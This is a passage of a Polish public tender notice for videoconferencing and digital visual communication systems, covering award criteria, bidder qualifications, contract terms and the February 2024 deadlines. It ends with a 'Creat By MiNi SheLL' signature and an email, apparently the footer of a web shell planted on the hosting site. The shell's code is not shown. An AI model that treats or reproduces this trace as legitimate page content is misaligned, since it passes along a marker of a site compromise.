class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zamawiający wymaga wykazania przez Wykonawcę spełnienia warunków określonych <br/>w art. 112 ust. 2 Ustawy dotyczących zdolności technicznej lub zawodowej.<br/>2. Wykonawca spełni warunek, o którym mowa w pkt 1, jeżeli wykaże, że w okresie <br/>ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia <br/>działalności jest krótszy – w tym okresie, wykonał należycie co najmniej 3 zamówienia <br/>polegające na dostawie systemów wideokonferencyjnych lub cyfrowej komunikacji <br/>wizualnej wraz z ich instalacją na kwotę co najmniej 200 000 zł brutto każde.<br/>3. Zamawiający dopuszcza łączenie ww. warunku w ramach konsorcjum lub poprzez <br/>udostępnienie zasobów.<br/>4. Warunek dotyczy obu części zamówienia. Można powielać te same zamówienia w obu <br/>częściach. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 Ustawy, w zakresie podstaw wykluczenia z <br/>postępowania wskazanych przez Zamawiającego (wzór – załącznik nr 5 do <br/>SWZ)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub <br/>ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres <br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich <br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których <br/>dostawy zostały wykonane lub są wykonywane, oraz załączeniem <br/>dowodów określających, czy te dostawy zostały wykonane lub są <br/>wykonywane należycie, przy czym dowodami, o których mowa, są <br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz <br/>którego dostawy zostały wykonane, a w przypadku świadczeń <br/>powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z <br/>przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –<br/>oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub <br/>ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające <br/>ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 <br/>miesięcy (wzór- załącznik nr 6 do SWZ)</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia do <br/>oferty należy załączyć pełnomocnictwo dla pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu <br/>i zawarcia umowy w sprawie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy dla obydwu zadań: Zgodnie z treścią SWZ oraz Projektowych postanowień umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/rars</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-28 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji zamówienia: dla każdej części zamówienia zgodnie z treścią oferty, nie dłużej niż w terminie do 45 dni od dnia zawarcia umów.

Creat By MiNi SheLL
Email: jattceo@gmail.com